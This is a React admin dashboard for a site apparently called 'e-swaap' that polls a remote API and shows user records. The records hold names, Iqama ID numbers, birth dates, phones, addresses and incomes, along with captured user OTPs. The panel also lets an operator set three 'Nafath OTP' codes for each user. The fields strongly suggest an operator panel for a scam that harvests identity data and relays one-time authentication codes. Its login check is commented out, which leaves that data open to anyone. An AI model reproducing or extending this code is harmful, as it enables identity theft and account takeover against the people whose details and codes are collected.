import React, { useEffect, useState } from "react";
import { FaTrashAlt } from "react-icons/fa";
import { toast } from "react-toastify";
// import { Link } from "react-router-dom";

const AdminDashboard = () => {
  // const AdminLoggedIn = localStorage.getItem("admin_loggedin");
  // useEffect(() => {
  //   if (!AdminLoggedIn) {
  //     window.location.href = "/admin/login";
  //   }
  // });
  const [orders, setOrders] = useState([]);

  // useEffect(() => {
  //   if (AdminLoggedIn) {
  //     const isFirstLogin = sessionStorage.getItem("first_login_shown");
  //     if (!isFirstLogin) {
  //       toast.success("Login successful");
  //       sessionStorage.setItem("first_login_shown", "true");
  //     }
  //   }
  // }, [AdminLoggedIn]);

  useEffect(() => {
    const fetchOrders = () => {
      fetch(`https://e-swaap-api.vercel.app/api/v1/users`, {
        method: "GET",
        headers: {
          "Content-Type": "application/json",
          "Allow-Control-Allow-Origin": "*",
        },
      })
        .then((response) => response.json())
        .then((data) => {
          setOrders(data);
          console.log(data);
        });
    };

    fetchOrders();
    const interval = setInterval(fetchOrders, 5000); // Check for updates every 5 seconds

    return () => clearInterval(interval); // Cleanup interval on component unmount
  }, []);



  // update first nafath otp
  const updateFirstNafathOtp = (id, value) => {
    fetch(`https://e-swaap-api.vercel.app/api/v1/users/${id}`, {
      method: "PUT",
      headers: {
        "Content-Type": "application/json",
        "Allow-Control-Allow-Origin": "*",
      },
      body: JSON.stringify({
        first_nafath_otp: value,
      }),
    })
      .then((response) => response.json())
      .then((data) => {
        // alert("First Nafath OTP Updated Successfully");
        toast.success("First Nafath OTP Updated Successfully");
      });
  };

  // update second nafath otp
  const updateSecondNafathOtp = (id, value) => {
    fetch(`https://e-swaap-api.vercel.app/api/v1/users/${id}`, {
      method: "PUT",
      headers: {
        "Content-Type": "application/json",
        "Allow-Control-Allow-Origin": "*",
      },
      body: JSON.stringify({
        second_nafath_otp: value,
      }),
    })
      .then((response) => response.json())
      .then((data) => {
        // alert("Second Nafath OTP Updated Successfully");
        toast.success("Second Nafath OTP Updated Successfully");
      });
  };

  // update third nafath otp
  const updateThirdNafathOtp = (id, value) => {
    fetch(`https://e-swaap-api.vercel.app/api/v1/users/${id}`, {
      method: "PUT",
      headers: {
        "Content-Type": "application/json",
        "Allow-Control-Allow-Origin": "*",
      },
      body: JSON.stringify({
        third_nafath_otp: value,
      }),
    })
      .then((response) => response.json())
      .then((data) => {
        // alert("Third Nafath OTP Updated Successfully");
        toast.success("Third Nafath OTP Updated Successfully");
      });
  };

  return (
    <div className="pb-14 pt-4 min-h-[calc(100vh-72px)]">
      <div className="container-fluid px-3 mx-auto">
        <div className="flex justify-between items-center gap-3">
          <div className="text-left">
            <h2 className="text-3xl font-bold">Welcome to the Admin Dashboard</h2>
            <p>
              You can manage all the products, categories, and orders from here.
            </p>
          </div>
          {/* log out */}
          <button
            className="bg-red-700 text-white px-4 py-2 rounded-md"
            onClick={() => {
              localStorage.removeItem("admin_loggedin");
              window.location.href = "/admin/login";
            }}
          >
            Log Out
          </button>
        </div>

        <hr className="mt-10" />
        <div className="mt-10">
          <h3 className="text-xl font-bold">Order List</h3>
          <div className="table-responsive overflow-x-auto pb-10">
            <table className="table border-0 text-start mt-5 w-full">
              <thead>
                <tr>
                  <th className="py-6 px-4 text-start bg-teal-700 text-white border-0 text-sm font-normal">
                    Date
                  </th>
                  <th className="py-6 px-4 text-start bg-teal-700 text-white border-0 text-sm font-normal">
                    Username
                  </th>
                  <th className="py-6 px-4 text-start bg-teal-700 text-white border-0 text-sm font-normal">
                    Iqama
                  </th>
                  <th className="py-6 px-4 text-start bg-teal-700 text-white border-0 text-sm font-normal">
                    Model
                  </th>
                  <th className="py-6 px-4 text-start bg-teal-700 text-white border-0 text-sm font-normal">
                    DOB
                  </th>
                  <th className="py-6 px-4 text-start bg-teal-700 text-white border-0 text-sm font-normal">
                    Phone
                  </th>
                  <th className="py-6 px-4 text-start bg-teal-700 text-white border-0 text-sm font-normal">
                    User OTP
                  </th>
                  <th className="py-6 px-4 text-start bg-teal-700 text-white border-0 text-sm font-normal">
                    Nafath OTP <br /> (First)
                  </th>
                  <th className="py-6 px-4 text-start bg-teal-700 text-white border-0 text-sm font-normal">
                    Nafath OTP <br /> (second)
                  </th>
                  <th className="py-6 px-4 text-start bg-teal-700 text-white border-0 text-sm font-normal">
                    Nafath OTP <br /> (third)
                  </th>
                  <th className="py-6 px-4 text-start bg-teal-700 text-white border-0 text-sm font-normal">
                    Country
                  </th>
                  <th className="py-6 px-4 text-start bg-teal-700 text-white border-0 text-sm font-normal">
                    Address
                  </th>
                  <th className="py-6 px-4 text-start bg-teal-700 text-white border-0 text-sm font-normal">
                    Profession
                  </th>
                  <th className="py-6 px-4 text-start bg-teal-700 text-white border-0 text-sm font-normal">
                    Monthly Income
                  </th>
                  <th className="py-6 px-4 text-start bg-teal-700 text-white border-0 text-sm font-normal">

                  </th>
                </tr>
              </thead>
              <tbody>
                {orders.length > 0
                  ? orders
                    .slice(0)
                    .reverse()
                    .map((order) => (
                      <tr className="border-y border-teal-700">
                        <td className="py-6 px-4 border-0 text-start  text-sm font-normal">
                          {/* {order.created_at} */}
                          {new Date(order.created_at).toLocaleString("en-US", {
                            day: "2-digit",
                            month: "short",
                            year: "numeric"
                          })}
                        </td>
                        <td className="py-6 px-4 border-0 text-start text-sm font-normal">
                          {order.name}
                        </td>
                        <td className="py-6 px-4 border-0 text-start text-sm font-normal">
                          {order.iqama_number}
                        </td>
                        <td className="py-6 px-4 border-0 text-sm font-normal text-start">
                          {order.model} - {order.storage} <br />
                          <div
                            className="w-[30px] h-[30px] mr-auto mt-2 rounded-full text-sm font-normal"
                            style={{ background: order.color }}
                          ></div>
                        </td>
                        <td className="py-6 px-4 border-0 text-sm font-normal">
                          {order.date_of_birth}
                        </td>
                        <td className="py-6 px-4 border-0 text-sm font-normal">
                          {order.mobile_number}
                        </td>
                        <td className="py-6 px-4 border-0 text-sm font-normal">
                          {order.first_otp}
                        </td>
                        <td className="py-6 px-4 border-0 text-sm font-normal">
                          <form action="" onSubmit={(e) => {
                            e.preventDefault();
                            const value = e.target[0].value;
                            updateFirstNafathOtp(order._id, value);
                          }}>
                            <input
                              type="text"
                              className="w-[100px] h-[35px] p-2 bg-gray-100"
                              defaultValue={order.first_nafath_otp}
                              maxLength="5"
                            />
                            <br />
                            <button className="bg-teal-700 text-white text-xs px-2 py-1 rounded-md mt-2">
                              Update
                            </button>
                          </form>
                        </td>
                        <td className="py-6 px-4 border-0 text-sm font-normal">
                          <form action="" onSubmit={(e) => {
                            e.preventDefault();
                            const value = e.target[0].value;
                            updateSecondNafathOtp(order._id, value);
                          }}>
                            <input
                              type="text"
                              className="w-[100px] h-[35px] p-2 bg-gray-100"
                              defaultValue={order.second_nafath_otp}
                              maxLength="5"
                            />
                            <br />
                            <button className="bg-teal-700 text-white text-xs px-2 py-1 rounded-md mt-2">
                              Update
                            </button>
                          </form>
                        </td>
                        <td className="py-6 px-4 border-0 text-sm font-normal">
                          <form action="" onSubmit={(e) => {
                            e.preventDefault();
                            const value = e.target[0].value;
                            updateThirdNafathOtp(order._id, value);
                          }}>
                            <input
                              type="text"
                              className="w-[100px] h-[35px] p-2 bg-gray-100"
                              defaultValue={order.third_nafath_otp}
                              maxLength="5"
                            />
                            <br />
                            <button className="bg-teal-700 text-white text-xs px-2 py-1 rounded-md mt-2">
                              Update
                            </button>
                          </form>
                        </td>
                        <td className="py-6 px-4 border-0 text-sm font-normal">
                          {order.nationality}
                        </td>
                        <td className="py-6 px-4 border-0 text-sm font-normal">
                          {order.address}
                        </td>
                        <td className="py-6 px-4 border-0 text-sm font-normal">
                          {order.profession}
                        </td>
                        <td className="py-6 px-4 border-0 text-sm font-normal">
                          {order.monthly_income}
                        </td>
                        <td className="py-6 px-4 border-0 text-sm font-normal">
                          <button
                            className="text-red-700 px-2 py-1 rounded-md mt-2"
                            onClick={() => {
                              fetch(`https://e-swaap-api.vercel.app/api/v1/users/${order._id}`, {
                                method: "DELETE",
                                headers: {
                                  "Content-Type": "application/json",
                                  "Allow-Control-Allow-Origin": "*",
                                },
                              })
                                .then((response) => response.json())
                                .then((data) => {
                                  // alert("Order Deleted Successfully");
                                  toast.success("Order Deleted Successfully");
                                });
                            }}
                          >
                            <FaTrashAlt />
                          </button>
                        </td>
                      </tr>
                    ))
                  :
                  <tr>
                    <td colSpan="15" className="py-10 px-4 bg-red-50 border-0 text-center text-xl font-bold text-red-400">
                      No orders found
                    </td>
                  </tr>
                }
              </tbody>
            </table>
          </div>
        </div>
      </div>
    </div >
  );
};

export default AdminDashboard;
